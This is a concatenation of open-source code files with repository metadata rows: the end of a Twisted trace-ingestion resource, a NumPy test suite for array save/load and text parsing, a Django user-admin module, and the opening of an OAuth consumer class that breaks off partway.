rp_error_response = headers.getRawHeaders('X-RP-Error-Message')[0]
request.setResponseCode(
self.rp_error_to_http_code.get(
rp_error_code, http.INTERNAL_SERVER_ERROR))
request.responseHeaders.setRawHeaders(
'Content-Type', ['application/json'])
return json.dumps({'ok': False,
'error_code': rp_error_code,
'error_message': rp_error_response})
def getChild(self, path, request):
if request.requestHeaders.hasHeader('X-RP-Error-Code'):
return self
return self._wrapped.getChild(path, request)
class RootResource(Resource):
def getChild(self, path, request):
if path == 'v1.0':
return VersionResource()
return NoResource()
class VersionResource(Resource):
def getChild(self, path, request):
if path == 'trace':
return TraceResource()
return NoResource()
# class TenantResource(Resource):
# def __init__(self, tenant_id):
# Resource.__init__(self)
# self._tenant_id = tenant_id
# def getChild(self, path, request):
# if path == 'trace':
# return TraceResource()
# return NoResource()
class TraceResource(Resource):
"""
TraceResource is responsible for taking POST requests and converting
the JSON output to a scribe log.
Response formats:
Success or partial failure:
{"succeeded": numberOfSucesfullyInsertedTraces,
"failed": numberOfTracesWhichFailedInsertion}
Failure due to invalid body:
{"error": "Error message"}
"""
def render_POST(self, request):
request.responseHeaders.setRawHeaders(
'content-type', ['application/json'])
body = request.content.read()
try:
spans = json.loads(body)
except ValueError:
log.err(None, 'Failed to decode request body')
msg = 'Could not decode request body (invalid JSON)'
return json.dumps({'error': msg})
succeeded, failed = 0, 0
for json_span in spans:
trace_id = None
span_id = None
try:
trace_id = decode_hex_number('trace_id', json_span['trace_id'])
span_id = decode_hex_number('span_id', json_span['span_id'])
parent_span_id = json_span.get('parent_span_id', None)
if parent_span_id is not None:
parent_span_id = decode_hex_number('parent_span_id',
parent_span_id)
t = Trace(json_span['name'], trace_id, span_id, parent_span_id)
for json_annotation in json_span['annotations']:
annotation = Annotation(
json_annotation['key'],
json_annotation['value'],
json_annotation['type'])
host = json_annotation.get('host', None)
if host:
annotation.endpoint = Endpoint(
host['ipv4'], host['port'], host['service_name'])
t.record(annotation)
succeeded = succeeded + 1
except Exception:
log.err(None,
'Failed to insert a trace: trace_id=%r,span_id=%r' %
(trace_id, span_id))
failed = failed + 1
continue
return json.dumps({'succeeded': succeeded, 'failed': failed})
| apache-2.0 | -2,226,201,732,277,251,300 | 30.316456 | 79 | 0.580841 | false |
qpython-android/QPypi-numpy | numpy/lib/tests/test_io.py | 1 | 31157 | import numpy as np
import numpy.ma as ma
from numpy.ma.testutils import *
import StringIO
import gzip
import os
from tempfile import mkstemp, NamedTemporaryFile
import sys, time
from datetime import datetime
MAJVER, MINVER = sys.version_info[:2]
def strptime(s, fmt=None):
"""This function is available in the datetime module only
from Python >= 2.5.
"""
return datetime(*time.strptime(s, fmt)[:3])
class RoundtripTest(object):
def roundtrip(self, save_func, *args, **kwargs):
"""
save_func : callable
Function used to save arrays to file.
file_on_disk : bool
If true, store the file on disk, instead of in a
string buffer.
save_kwds : dict
Parameters passed to `save_func`.
load_kwds : dict
Parameters passed to `numpy.load`.
args : tuple of arrays
Arrays stored to file.
"""
save_kwds = kwargs.get('save_kwds', {})
load_kwds = kwargs.get('load_kwds', {})
file_on_disk = kwargs.get('file_on_disk', False)
if file_on_disk:
# Do not delete the file on windows, because we can't
# reopen an already opened file on that platform, so we
# need to close the file and reopen it, implying no
# automatic deletion.
if sys.platform == 'win32' and MAJVER >= 2 and MINVER >= 6:
target_file = NamedTemporaryFile(delete=False)
else:
target_file = NamedTemporaryFile()
load_file = target_file.name
else:
target_file = StringIO.StringIO()
load_file = target_file
arr = args
save_func(target_file, *arr, **save_kwds)
target_file.flush()
target_file.seek(0)
if sys.platform == 'win32' and not isinstance(target_file, StringIO.StringIO):
target_file.close()
arr_reloaded = np.load(load_file, **load_kwds)
self.arr = arr
self.arr_reloaded = arr_reloaded
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
self.roundtrip(a)
a = np.array([[1, 2], [3, 4]], int)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
self.roundtrip(a)
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
self.roundtrip(a)
@np.testing.dec.knownfailureif(sys.platform=='win32', "Fail on Win32")
def test_mmap(self):
a = np.array([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
self.roundtrip(a)
class TestSaveLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
assert_equal(self.arr[0], self.arr_reloaded)
class TestSavezLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
for n, arr in enumerate(self.arr):
assert_equal(arr, self.arr_reloaded['arr_%d' % n])
def test_multiple_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
self.roundtrip(a,b)
def test_named_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = StringIO.StringIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(a, l['file_a'])
assert_equal(b, l['file_b'])
class TestSaveTxt(TestCase):
def test_array(self):
a =np.array([[1, 2], [3, 4]], float)
fmt = "%.18e"
c = StringIO.StringIO()
np.savetxt(c, a, fmt=fmt)
c.seek(0)
assert_equal(c.readlines(),
[(fmt + ' ' + fmt + '\n') % (1, 2),
(fmt + ' ' + fmt + '\n') % (3, 4)])
a =np.array([[1, 2], [3, 4]], int)
c = StringIO.StringIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), ['1 2\n', '3 4\n'])
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = StringIO.StringIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, ['1\n', '2\n', '3\n', '4\n'])
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = StringIO.StringIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), ['1 2\n', '3 4\n'])
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = StringIO.StringIO()
np.savetxt(c, a, delimiter=',', fmt='%d')
c.seek(0)
assert_equal(c.readlines(), ['1,2\n', '3,4\n'])
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = StringIO.StringIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), ['01 2.0\n', '03 4.0\n'])
# A single multiformat string
c = StringIO.StringIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, ['01 : 2.0\n', '03 : 4.0\n'])
# Specify delimiter, should be overiden
c = StringIO.StringIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, ['01 : 2.0\n', '03 : 4.0\n'])
class TestLoadTxt(TestCase):
def test_record(self):
c = StringIO.StringIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_array_equal(x, a)
d = StringIO.StringIO()
d.write('M 64.0 75.0\nF 25.0 60.0')
d.seek(0)
mydescriptor = {'names': ('gender','age','weight'),
'formats': ('S1',
'i4', 'f4')}
b = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=mydescriptor)
y = np.loadtxt(d, dtype=mydescriptor)
assert_array_equal(y, b)
def test_array(self):
c = StringIO.StringIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([[1, 2], [3, 4]], int)
assert_array_equal(x, a)
c.seek(0)
x = np.loadtxt(c, dtype=float)
a = np.array([[1, 2], [3, 4]], float)
assert_array_equal(x, a)
def test_1D(self):
c = StringIO.StringIO()
c.write('1\n2\n3\n4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
c = StringIO.StringIO()
c.write('1,2,3,4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
def test_missing(self):
c = StringIO.StringIO()
c.write('1,2,3,,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or -999)})
a = np.array([1, 2, 3, -999, 5], int)
assert_array_equal(x, a)
def test_converters_with_usecols(self):
c = StringIO.StringIO()
c.write('1,2,3,,5\n6,7,8,9,10\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or -999)}, \
usecols=(1, 3,))
a = np.array([[2, -999], [7, 9]], int)
assert_array_equal(x, a)
def test_comments(self):
c = StringIO.StringIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
comments='#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_skiprows(self):
c = StringIO.StringIO()
c.write('comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = StringIO.StringIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_usecols(self):
a = np.array([[1, 2], [3, 4]], float)
c = StringIO.StringIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1,))
assert_array_equal(x, a[:,1])
a =np.array([[1, 2, 3], [3, 4, 5]], float)
c = StringIO.StringIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1, 2))
assert_array_equal(x, a[:, 1:])
# Testing with arrays instead of tuples.
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
assert_array_equal(x, a[:, 1:])
# Checking with dtypes defined converters.
data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
c = StringIO.StringIO(data)
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
arr = np.loadtxt(c, usecols=(0, 2), dtype=zip(names, dtypes))
assert_equal(arr['stid'], ["JOE", "BOB"])
assert_equal(arr['temp'], [25.3, 27.9])
def test_fancy_dtype(self):
c = StringIO.StringIO()
c.write('1,2,3.0\n4,5,6.0\n')
c.seek(0)
dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
x = np.loadtxt(c, dtype=dt, delimiter=',')
a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
assert_array_equal(x, a)
def test_empty_file(self):
c = StringIO.StringIO()
assert_raises(IOError, np.loadtxt, c)
def test_unused_converter(self):
c = StringIO.StringIO()
c.writelines(['1 21\n', '3 42\n'])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_array_equal(data, [21, 42])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_array_equal(data, [33, 66])
class Testfromregex(TestCase):
def test_record(self):
c = StringIO.StringIO()
c.write('1.312 foo\n1.534 bar\n4.444 qux')
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = StringIO.StringIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = StringIO.StringIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
#####--------------------------------------------------------------------------
class TestFromTxt(TestCase):
#
def test_record(self):
"Test w/ explicit dtype"
data = StringIO.StringIO('1 2\n3 4')
# data.seek(0)
test = np.ndfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = StringIO.StringIO('M 64.0 75.0\nF 25.0 60.0')
# data.seek(0)
descriptor = {'names': ('gender','age','weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.ndfromtxt(data, dtype=descriptor)
assert_equal(test, control)
def test_array(self):
"Test outputing a standard ndarray"
data = StringIO.StringIO('1 2\n3 4')
control = np.array([[1,2],[3,4]], dtype=int)
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1,2],[3,4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
"Test squeezing to 1D"
control = np.array([1, 2, 3, 4], int)
#
data = StringIO.StringIO('1\n2\n3\n4\n')
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = StringIO.StringIO('1,2,3,4\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',')
assert_array_equal(test, control)
def test_comments(self):
"Test the stripping of comments"
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = StringIO.StringIO('# comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
# Comment at the end of a line
data = StringIO.StringIO('1,2,3,5# comment\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
def test_skiprows(self):
"Test row skipping"
control = np.array([1, 2, 3, 5], int)
#
data = StringIO.StringIO('comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', skiprows=1)
assert_equal(test, control)
#
data = StringIO.StringIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, dtype=int, delimiter=',', skiprows=1)
assert_equal(test, control)
def test_header(self):
"Test retrieving a header"
data = StringIO.StringIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
test = np.ndfromtxt(data, dtype=None, names=True)
control = {'gender': np.array(['M', 'F']),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
"Test the automatic definition of the output dtype"
data = StringIO.StringIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
test = np.ndfromtxt(data, dtype=None)
control = [np.array(['A', 'BCD']),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3+4j, 5+6j]),
np.array([True, False]),]
assert_equal(test.dtype.names, ['f0','f1','f2','f3','f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
"Tests whether the output dtype can be uniformized"
data = StringIO.StringIO('1 2 3 4\n5 6 7 8\n')
test = np.ndfromtxt(data, dtype=None)
control = np.array([[1,2,3,4],[5,6,7,8]])
assert_equal(test, control)
def test_fancy_dtype(self):
"Check that a nested dtype isn't MIA"
data = StringIO.StringIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.ndfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1,(2,3.0)),(4,(5,6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
"Test overwriting the names of the dtype"
descriptor = {'names': ('g','a','w'),
'formats': ('S1', 'i4', 'f4')}
data = StringIO.StringIO('M 64.0 75.0\nF 25.0 60.0')
names = ('gender','age','weight')
test = np.ndfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
"Check that names can be retrieved even if the line is commented out."
data = StringIO.StringIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
test = np.genfromtxt(data, names=True, dtype=None)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender','|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = StringIO.StringIO("""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
test = np.genfromtxt(data, names=True, dtype=None)
assert_equal(test, ctrl)
def test_autonames_and_usecols(self):
"Tests names and usecols"
data = StringIO.StringIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
"Test the combination user-defined converters and usecol"
data = StringIO.StringIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3:lambda s: int(s or -999)},
usecols=(1, 3, ))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
"Tests names and usecols"
data = StringIO.StringIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None, converters={'C':lambda s: 2 * int(s)})
control = np.array(('aaaa', 90, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
"Test the conversion to datetime."
converter = {'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
data = StringIO.StringIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date','stid'], converters=converter)
control = np.array((datetime(2009,02,03), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
"Test whether unused converters are forgotten"
data = StringIO.StringIO("1 21\n 3 42\n")
test = np.ndfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.ndfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.ndfromtxt(StringIO.StringIO(dstr,),
delimiter=";", dtype=float, converters={0:str})
control = np.array([('2009', 23., 46)],
dtype=[('f0','|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.ndfromtxt(StringIO.StringIO(dstr,),
delimiter=";", dtype=float, converters={0:float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """
1; 2001-01-01
2; 2002-01-31
"""
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(StringIO.StringIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array([(1, datetime(2001,1,1)), (2, datetime(2002,1,31))],
dtype=ndtype)
assert_equal(test, control)
#
ndtype = [('nest', [('idx', int), ('code', np.object)])]
try:
test = np.genfromtxt(StringIO.StringIO(data), delimiter=";",
dtype=ndtype, converters=converters)
except NotImplementedError:
pass
else:
errmsg = "Nested dtype involving objects should be supported."
raise AssertionError(errmsg)
def test_userconverters_with_explicit_dtype(self):
"Test user_converters w/ explicit (standard) dtype"
data = StringIO.StringIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: str})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
"Test space delimiter"
data = StringIO.StringIO("1 2 3 4 5\n6 7 8 9 10")
test = np.ndfromtxt(data)
control = np.array([[ 1., 2., 3., 4., 5.],
[ 6., 7., 8., 9.,10.]])
assert_equal(test, control)
def test_missing(self):
data = StringIO.StringIO('1,2,3,,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or -999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_usecols(self):
"Test the selection of columns"
# Select 1 column
control = np.array( [[1, 2], [3, 4]], float)
data = StringIO.StringIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array( [[1, 2, 3], [3, 4, 5]], float)
data = StringIO.StringIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
# Checking with dtypes defined converters.
data = StringIO.StringIO("""JOE 70.1 25.3\nBOB 60.5 27.9""")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.ndfromtxt(data, usecols=(0, 2), dtype=zip(names, dtypes))
assert_equal(test['stid'], ["JOE", "BOB"])
assert_equal(test['temp'], [25.3, 27.9])
def test_empty_file(self):
"Test that an empty file raises the proper exception"
data = StringIO.StringIO()
assert_raises(IOError, np.ndfromtxt, data)
def test_fancy_dtype_alt(self):
"Check that a nested dtype isn't MIA"
data = StringIO.StringIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.mafromtxt(data, dtype=fancydtype, delimiter=',')
control = ma.array([(1,(2,3.0)),(4,(5,6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_withmissing(self):
data = StringIO.StringIO('A,B\n0,1\n2,N/A')
test = np.mafromtxt(data, dtype=None, delimiter=',', missing='N/A',
names=True)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.mafromtxt(data, delimiter=',', missing='N/A', names=True)
control = ma.array([(0, 1), (2, -1)],
mask=[[False, False], [False, True]],)
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
datastr ="A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
data = StringIO.StringIO(datastr)
basekwargs = dict(dtype=None, delimiter=',', names=True, missing='N/A')
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.mafromtxt(data, **basekwargs)
control = ma.array([( 0, 0.0, 0j), (1, -999, 1j),
( -9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
data.seek(0)
test = np.mafromtxt(data,
missing_values={0:-9, 1:-99, 2:-999j}, **basekwargs)
control = ma.array([( 0, 0.0, 0j), (1, -999, 1j),
( -9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
data.seek(0)
test = np.mafromtxt(data,
missing_values={0:-9, 'B':-99, 'C':-999j},
**basekwargs)
control = ma.array([( 0, 0.0, 0j), (1, -999, 1j),
( -9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
def test_withmissing_float(self):
data = StringIO.StringIO('A,B\n0,1.5\n2,-999.00')
test = np.mafromtxt(data, dtype=None, delimiter=',', missing='-999.0',
names=True,)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
"Test masked column"
data = StringIO.StringIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, missing='2,5', dtype=None, usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0],[0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
"Test masked column"
data = StringIO.StringIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, missing='2,5', dtype=None, usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
mask=[(0, 1, 0),(0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_recfromtxt(self):
#
data = StringIO.StringIO('A,B\n0,1\n2,3')
test = np.recfromtxt(data, delimiter=',', missing='N/A', names=True)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.failUnless(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = StringIO.StringIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, delimiter=',', missing='N/A',
names=True, usemask=True)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = StringIO.StringIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing='N/A',
names=True, case_sensitive=True)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.failUnless(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = StringIO.StringIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, missing='N/A',
names=True, case_sensitive=True, usemask=True)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = StringIO.StringIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing='N/A',)
control = np.array([(0, 1), (2, 3)],
dtype=[('a', np.int), ('b', np.int)])
self.failUnless(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gzip_load():
a = np.random.random((5, 5))
s = StringIO.StringIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
# Thanks to another windows brokeness, we can't use
# NamedTemporaryFile: a file created from this function cannot be
# reopened by another open call. So we first put the gzipped string
# of the test reference array, write it to a securely opened file,
# which is then read from by the loadtxt function
s = StringIO.StringIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write('1 2 3\n')
g.close()
s.seek(0)
f, name = mkstemp(suffix='.gz')
try:
os.write(f, s.read())
s.close()
assert_array_equal(np.loadtxt(name), [1, 2, 3])
finally:
os.close(f)
os.unlink(name)
def test_gzip_loadtxt_from_string():
s = StringIO.StringIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write('1 2 3\n')
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause | 7,035,468,945,602,116,000 | 35.440936 | 86 | 0.505472 | false |
SmartElect/SmartElect | staff/admin.py | 1 | 1127 | from django.contrib.auth.models import User, Group, Permission
from django.contrib.auth.admin import UserAdmin, GroupAdmin
from libya_elections.admin_site import admin_site
class LibyaUserAdmin(UserAdmin):
list_display = ('username', 'email', 'first_name', 'last_name', 'is_active', 'is_staff',
'is_superuser')
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('username', 'password1', 'password2', 'email')
}),
)
def get_actions(self, request):
""""Don't allow bulk deletion."""
return {}
def get_form(self, request, obj=None, **kwargs):
"""Make email a required field."""
form = super(LibyaUserAdmin, self).get_form(request, obj, **kwargs)
email = form.base_fields['email']
email.required = True
return form
def has_delete_permission(self, request, obj=None):
"""Don't allow deletion of users. (Inactivate them instead)."""
return False
admin_site.register(User, LibyaUserAdmin)
admin_site.register(Group, GroupAdmin)
admin_site.register(Permission)
| apache-2.0 | -4,079,308,572,742,323,700 | 30.305556 | 92 | 0.62378 | false |
CLLKazan/iCQA | qa-engine/forum_modules/oauthauth/consumer.py | 1 | 3718 | import urllib
import urllib2
import httplib
import time
from forum.authentication.base import AuthenticationConsumer, InvalidAuthentication
from django.utils.translation import ugettext as _
from lib import oauth
class OAuthAbstractAuthConsumer(AuthenticationConsumer):
def __init__(self, consumer_key, consumer_secret, server_url, request_token_url, access_token_url, authorization_url):
self.consumer_secret = consumer_secret
self.consumer_key = consumer_key
self.consumer = oauth.OAuthConsumer(consumer_key, consumer_secret)
self.signature_method = oauth.OAuthSignatureMethod_HMAC_SHA1()
self.server_url = server_url
self.request_token_url = request_token_url
self.access_token_url = access_token_url
self.authorization_url = authorization_url
def prepare_authentication_request(self, request, redirect_to):
request_token = self.fetch_request_token()
